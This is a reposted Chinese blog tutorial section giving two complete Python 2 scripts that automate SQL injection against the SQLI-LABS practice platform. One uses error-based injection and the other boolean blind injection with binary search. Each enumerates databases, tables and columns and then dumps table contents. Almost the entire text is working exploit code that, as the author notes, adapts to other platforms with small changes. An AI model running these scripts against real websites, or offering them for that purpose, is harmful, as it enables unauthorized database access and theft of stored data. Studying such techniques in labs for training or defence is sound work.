三、基于报错型注入和sql盲注的自动化实现

通过前面payload的构造,不难发现,对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的。这些payload语句虽然复杂,但大部分内容都是相同的,因此,一言不合就写了个脚本自动化注入,坐等信息爆出的感觉–>我就静静看着不说话_<–

以下两个python脚本仅适用于SQLI-LABS,在其他平台使用还需要做少许改动~~~
*** SQLI-LABS 是一个专业的SQL注入练习平台**

基于报错型注入的自动化脚本(sqli-labs-master/Less-5/)

#!/usr/bin/env python
#coding=utf-8

import sys
import requests
import re
import binascii
#sys.argv[1]
# --dbs url
# --tables -D database url
# --columns -T tablename -D database url
# --dump -C columnname -T tablename -D database url

def http_get(url):
    # proxies = {'http': 'http://127.0.0.1:8080'}
    #return requests.get(dbs_num_url, proxies=proxies)
    return requests.get(url)

def getAllDatabases(url):
    dbs_num_url = url + "'+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ "
    resp = http_get(dbs_num_url)
    html = resp.content
    #print html
    # ~~:~~4~~:~~
    dbs_num = int(re.search(r'~~:~~(\d*?)~~:~~', html).group(1))
    print (u"数据库数量: %d" % dbs_num)
    dbs = []
    print (u"数据库名: ")
    for index in xrange(0,dbs_num):
        db_name_url = url + "'+and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e, table_schema, 0x7e7e3a7e7e) from information_schema.tables limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % index
        html = http_get(db_name_url).content
        db_name = re.search(r'~~:~~(.*?)~~:~~', html).group(1)
        dbs.append(db_name)
        print ("\t%s" % db_name)
def getAllTablesByDb(url, db_name):
    db_name_hex = "0x" + binascii.b2a_hex(db_name)
    tables_num_url = url + "'+and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, count(table_name), 0x7e7e3a7e7e)  from information_schema.tables where table_schema=%s)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % db_name_hex
    html = http_get(tables_num_url).content
    tables_num = int(re.search(r'~~:~~(\d*?)~~:~~', html).group(1))
    print (u"%s 库中,表的数量: %d" % (db_name, tables_num))
    print (u"表名: ")
    for index in xrange(0,tables_num):
        tables_name_url = url + "'+and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, table_name, 0x7e7e3a7e7e) from information_schema.tables where table_schema=%s limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % (db_name_hex, index)
        html = http_get(tables_name_url).content
        table_name = re.search(r'~~:~~(.*?)~~:~~', html).group(1)
        print ("\t%s" % table_name)

def getAllColumnsByTable(url, db_name,tab_name):
    db_name_hex = "0x" + binascii.b2a_hex(db_name)
    tab_name_hex = "0x" + binascii.b2a_hex(tab_name)
    column_num_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(column_name) from information_schema.columns where table_schema=%s and table_name=%s),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name_hex,tab_name_hex)
    html = http_get(column_num_url).content
    column_num = int(re.search(r'::(\d*?)::', html).group(1))
    print (u"%s 表中,字段的数量: %d" % (tab_name, column_num))
    print (u"列名:")
    for index in xrange(0,column_num):
        tables_name_url = url + "' and (select 1  from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema=%s and table_name=%s limit %d,1),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name_hex,tab_name_hex,index)
        html = http_get(tables_name_url).content
        column_name = re.search(r'::(.*?)::', html).group(1)
        print ("\t%s" % column_name)
    pass

def getAllContent(url, db_name, tab_name, col_name,):
    # db_name_hex = "0x" + binascii.b2a_hex(db_name)
    # tab_name_hex = "0x" + binascii.b2a_hex(tab_name)
    # col_name = binascii.b2a_hex(col_name)
    # col = re.split(",",col_name) #分割参数:字段名
    # le = len(col)
    content_num_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(*) from %s.%s),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name,tab_name)
    html = http_get(content_num_url).content
    col_name_re = col_name.replace(',',',0x09,')
    content_num = int(re.search(r'::(\d*?)::', html).group(1))
    print "%s 表中,行数为: %d" % (tab_name, content_num)
    for index in xrange(0,content_num):
            content_name_url = url + "' and (select 1  from (select count(*),concat((select concat(0x3a,0x3a,%s,0x3a,0x3a) from %s.%s limit %d,1), floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (col_name_re,db_name,tab_name,index)
            html = http_get(content_name_url).content
            # print htmlsss
            content_name = re.search(r'::(.*?)::', html).group(1)
            print "\t%s" % content_name


def main():
    if sys.argv[1] == '--dbs':
        getAllDatabases(sys.argv[2])
    elif sys.argv[1] == '--tables':
        getAllTablesByDb(sys.argv[4], sys.argv[3])
    elif sys.argv[1] == '--columns':
        # print sys.argv[6],sys.argv[5],sys.argv[3]
        getAllColumnsByTable(sys.argv[6],sys.argv[5],sys.argv[3])
        pass
    elif sys.argv[1] == '--dump':
        getAllContent(sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3])
        # print sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3]
        pass
    else:
        print (u"我不懂你的参数!")

if __name__ == '__main__':
    main()

基于bool型注入(sql盲注)的自动化脚本(sqli-labs-master/Less-8/)

#!/usr/bin/env python
#coding=utf-8

import sys
import requests
import re
import binascii

#sys.argv[1]
# --dbs url
# --tables url -D database
# --columns url -D database -T tablename
# --dump url -D database -T tablename -C columnname

def http_get(url):
    return requests.get(url)
    pass

def dichotomy(sql):  #二分法
    left = 1
    right = 500
    while 1:
        mid = (left + right)/2
        # print mid
        if mid == left:
            return mid
            break
        db_count_url = sql + "%d)--+" % mid
        # print db_count_url
        html = http_get(db_count_url).content
        # print html
        search_flag = re.search("You are in", html)
        if search_flag:
            right = mid
            # print "right:" + str(right)
        else:
            left = mid
            # print "left:" + str(left)

def getAllDabatases(url):
    search_db_num =url + "' and ((select count(schema_name) from information_schema.schemata) < "  #查看数据库总个数
    num = dichotomy(search_db_num)
    # print num
    print ("\t" + u"数据库个数: %d" % num)

    for x in xrange(0,num):
        search_db_len = url + "' and ((select length(schema_name) from information_schema.schemata limit %d,1) < " % x  #看某个数据库名的长度
        db_len = dichotomy(search_db_len)
        print (u"第%d个数据库名的长度: %d" % (x+1,db_len))
        db_name = ''
        for n in xrange(1,db_len+1):
            search_db_name = url + "' and ((select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))) < " % (x,n)    #查看某个数据库名
            db_name1 = chr(dichotomy(search_db_name))
            # print search_db_name
            db_name = db_name + db_name1
        print "\t" + db_name

def getAlltablesByDb(url, db_name):
    db_name_hex = "0x" + binascii.b2a_hex(db_name)
    search_tab_num = url + "' and ((select count(distinct+table_name) from information_schema.tables where table_schema=%s ) < " % db_name_hex
    num = dichotomy(search_tab_num)
    # print search_tab_num
    print ("\t" + u"表的个数: %d" % num)

    for x in xrange(0,num):
        search_tab_len = url + "' and ((select length(table_name) from information_schema.tables where table_schema=%s limit %d,1) < " % (db_name_hex,x)  #查看某个表名的长度
        tab_len = dichotomy(search_tab_len)
        print (u"第%d个表名的长度: %d" % (x+1,tab_len))
        tab_name = ''
        for n in xrange(1,tab_len+1):
            search_tab_name = url + "' and ((select ascii(substr((select table_name from information_schema.tables where table_schema=%s limit %d,1),%d,1))) < " % (db_name_hex,x,n)    #查看某个表名
            tab_name1 = chr(dichotomy(search_tab_name))
            # print search_db_name
            tab_name = tab_name + tab_name1
        
        print "\t" + tab_name

def getAllcolumnsByTable(url, db_name, tab_name):
    db_name_hex = "0x" + binascii.b2a_hex(db_name)
    tab_name_hex = "0x" + binascii.b2a_hex(tab_name)
    search_column_num = url + "' and ((select count(distinct+column_name) from information_schema.columns where table_schema=%s and table_name=%s ) < " % (db_name_hex,tab_name_hex)
    num = dichotomy(search_column_num)
    print search_column_num
    print ("\t" + u"表中字段的个数: %d" % num)

    for x in xrange(0,num):
        search_column_len = url + "' and ((select length(column_name) from information_schema.columns where table_schema=%s and table_name=%s limit %d,1) < " % (db_name_hex,tab_name_hex,x)  #查看某个字段名的长度
        column_len = dichotomy(search_column_len)
        print (u"第%d个字段名的长度: %d" % (x+1,column_len))
        column_name = ''
        for n in xrange(1,column_len+1):
            search_column_name = url + "' and ((select ascii(substr((select column_name from information_schema.columns where table_schema=%s and table_name=%s limit %d,1),%d,1))) < " % (db_name_hex,tab_name_hex,x,n)    #查看某个字段名
            column_name1 = chr(dichotomy(search_column_name))
            # print search_db_name
            column_name = column_name + column_name1
        
        print "\t" + column_name

def getAllcontent(url, db_name, tab_name, col_name):
    col_name_hex = "0x" + binascii.b2a_hex(col_name)
    search_content_num = url + "' and ((select count(*) from %s.%s ) < " % (db_name,tab_name)
    num = dichotomy(search_content_num)
    # print search_content_num
    print ("\t" + u"表中的行数为:: %d" % num)
    c_num =col_name.split(',')  #传入的字段个数
    c = len(c_num)
    for x in xrange(0,num):
        print "第%d行:"% (x+1)
        for y in xrange(0,c):
            search_content_len = url + "' and ((select length(%s) from %s.%s limit %d,1) < " % (c_num[y],db_name,tab_name,x)  #查看某个字段对应内容的长度
            content_len = dichotomy(search_content_len)
            print (u"\t第%d个字段对应内容的长度: %d" % (y+1,content_len))
            content_name = ''
            for n in xrange(1,content_len+1):
                search_content_name = url + "' and ((select ascii(substr((select %s from %s.%s limit %d,1),%d,1))) < " % (c_num[y],db_name,tab_name,x,n)    #查看某个字段名对应内容
                content_name1 = chr(dichotomy(search_content_name))
            # print search_db_name
                content_name = content_name + content_name1
            print "\t%s" % c_num[y] + ':\t' + content_name

def main():
    if sys.argv[1]=='--dbs':
        getAllDabatases(sys.argv[2])
    elif sys.argv[1]=='--tables':
        getAlltablesByDb(sys.argv[2],sys.argv[4])
    elif sys.argv[1]=='--columns':
        getAllcolumnsByTable(sys.argv[2],sys.argv[4],sys.argv[6])
    elif sys.argv[1]=='--dump':
        getAllcontent(sys.argv[2],sys.argv[4],sys.argv[6],sys.argv[8],)
        pass
    else:
        print '我不懂你的参数!'

if __name__ == '__main__':
    main()
    原文作者:就是爱文艺
    原文地址: https://www.jianshu.com/p/62a92fc0bca1
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞